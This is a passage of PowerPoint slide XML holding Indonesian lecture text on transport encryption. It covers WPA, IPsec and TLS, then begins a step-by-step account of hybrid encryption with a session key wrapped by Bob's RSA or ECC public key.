              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> transport </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antaranya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Wi-Fi Protected Access (WPA)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Internet Protocol Security (IPsec) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transportasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual (VPN).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Transport Layer Security (TLS)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> email, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data-at-rest, cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transportasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertukar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RSA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ECC Bob, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital Bob digital Bob. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AES. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Bob. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melampirkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ciphertext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>amplop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital dan </a:t>
            </a:r>
            <a:r>
